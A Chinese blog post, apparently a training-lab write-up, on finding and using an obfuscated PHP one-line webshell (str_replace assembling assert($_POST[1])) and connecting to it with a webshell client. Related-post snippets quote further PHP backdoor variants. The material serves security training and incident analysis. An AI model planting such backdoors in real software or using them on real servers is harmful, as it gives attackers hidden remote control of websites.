墨者学院-WebShell代码分析溯源(第11题)

最新推荐文章于 2022-11-28 12:14:00 发布
最新推荐文章于 2022-11-28 12:14:00 发布
阅读量236 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39998158/article/details/100548753
版权

WebShell代码分析溯源(第11题)

难易程度:★★★
题目类型:代码审计
使用工具:FireFox浏览器、菜刀

1.打开靶场,下载备份文件。

2.解压文件,分析代码。
在这里插入图片描述
3.从代码中,知道当1=GET.fpz287时会生成t.php,所以我们要在url中输入。
在这里插入图片描述
我们继续分析一下代码,能看出代码中运用了str_replace函数。
该函数会把以其他字符替换字符串中的一些字符,在代码中就是把ilo替换为ass,vey替换为ert。
从而构成了一句话木马assert($_POST[1])。

4.分析完代码后,我们尝试使用菜刀连接。
url为http://219.153.49.228:47760/include/t.php?2=ilovey
密码为1
在这里插入图片描述
5.菜刀连接成功,也能看到生成的t.php
在这里插入图片描述
6.我们打开www文件夹,就能找到key的文本,获取key。
在这里插入图片描述

JimWu95
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院 - WebShell代码分析溯源(第11)
多崎巡礼的博客
08-06 695
<?php  if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87'){                     //若get到的1不为空且1=GET.fPZ87的话执行下面操作     $_=@fopen('t.php', 'a');                                                      ...
墨者学院 - WebShell代码分析溯源(第1)
多崎巡礼的博客
07-27 1251
下载源码 使用seay源代码审计系统扫一扫(实在不想一个个去看。。。) seay源代码审计系统:https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg     下载出源代码,找到cn-right.php   <?php error_reporting(0); $_GET['POST']($_POST['GET']); ?> ...
墨者 - WebShell代码分析溯源(第11)
吃肉唐僧的博客
07-15 424
下载文件,如下代码 <?php if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87'){ $_=@fopen('t.php', 'a'); @fwrite($_,"<?php \$_=str_replace('ilo','ass',str_replace('vey','ert',\$_GET[2])); @\$_(\$_POST...
WebShell文件上传漏洞分析溯源(墨者学院)
全村的希望
10-14 928
WebShell文件上传漏洞分析溯源
墨者学院WebShell代码分析溯源(第6)
vergilben的学习日记
04-03 9522
墨者学院WebShell代码分析溯源(第6) 进入环境: 下载并分析源码: 在如上路径中发现pic3.jpg.php,打开如下所示: 图中箭头指的很明显,是一句话木马,需要用到菜刀连接,但是后面很明显与base64有关,所以,我们需要一个指令来让它变成(xxx,一句话木马),思考一下这里应该是个插入语句,我们平常用到的,是eval函数,但我们看一下eval函数的解释: 所以eval函数是无...
墨者学院WebShell文件上传漏洞分析溯源(第2)
m0_66835614的博客
11-28 1197
墨者学院WebShell文件上传漏洞分析溯源(第2)
墨者学院 - WebShell代码分析溯源(第8)
多崎巡礼的博客
08-05 712
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。 C:\Users\BayernChenTutu\Desktop\www_bak\fields\class-wp-rest-comment-meta-style.php   &lt;?php error_reporting(0); ...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
3. **检测**:通过静态代码分析、动态运行时检测和漏洞扫描工具,可以发现潜在的代码执行风险。 4. **危害**:攻击者可以通过RCE漏洞执行任意命令,获取敏感信息,篡改数据,甚至完全控制服务器。 5. **修复**:最佳...
墨者学院 - WebShell代码分析溯源(第10)
多崎巡礼的博客
08-05 501
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。   &lt;?php error_reporting(0); $e = $_REQUEST['e']; declare(ticks=1); register_tick_function ($e, $_REQUEST...
【愚公系列】2021年12月 攻防世界-简单-WEB-010(webshell)
热门推荐
时光隧道
12-25 3万+
文章目录一、webshell二、使用步骤1.点击获取在线场景2.webshell总结webshell相关例子webshell相关工具 一、webshell 目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&page=1 二、使用步骤 1.点击获取在线场景 2.webshell 进入网页 上中国蚁剑 发现flag:cyberpeace{250cf53b93cb75f6a7b240
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 814
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.csdn.net/qq_24196029/article/details/78118680     &lt;?php error_reporting(0); call...
墨者学院-WebShell代码分析溯源(第9)
JimWu的博客
09-04 188
WebShell代码分析溯源(第9) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀 1.访问网页,下载网页源代码。 2.根据最后的修改时间,确定可疑的文件。 3.打开文件,发现是一句话木马病毒。 register_shutdown_function函数是在代码执行完成后执行的,所以当e=assert时,把$_REQUES...
20220129--CTF WEB方向刷-- WP--非常简单的webshell
qq_51550750的博客
01-30 625
CTF—攻防世界–新手场–webshell 攻防世界官网:https://adworld.xctf.org.cn/ 更多CTF刷平台汇总: https://blog.csdn.net/qq_51550750/article/details/122748075 已经得知是POST请求且传参就是shell: 首先试试行不行: shell=phpinfo(); 成功: 再尝试系统命令: shell=system("ls"); 得到目录: 即: 然后读取flag.txt shell=system
墨者学院 - WebShell代码分析溯源(第7)
多崎巡礼的博客
08-05 685
代码审查 在random_int.php 前排 发现以下回调后门 &lt;?php error_reporting(0); $e = $_REQUEST['e']; $arr = array('test', $_REQUEST['POST']); uasort($arr, base64_decode($e)); 诸如此类还有 &lt;?php $e = $_REQUEST['...
基于Springboot和Vue的数码论坛系统设计与实现-源码 数码论坛系统设计与实现代码(高分毕设)
最新发布
07-24
数码论坛系统设计与实现-源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值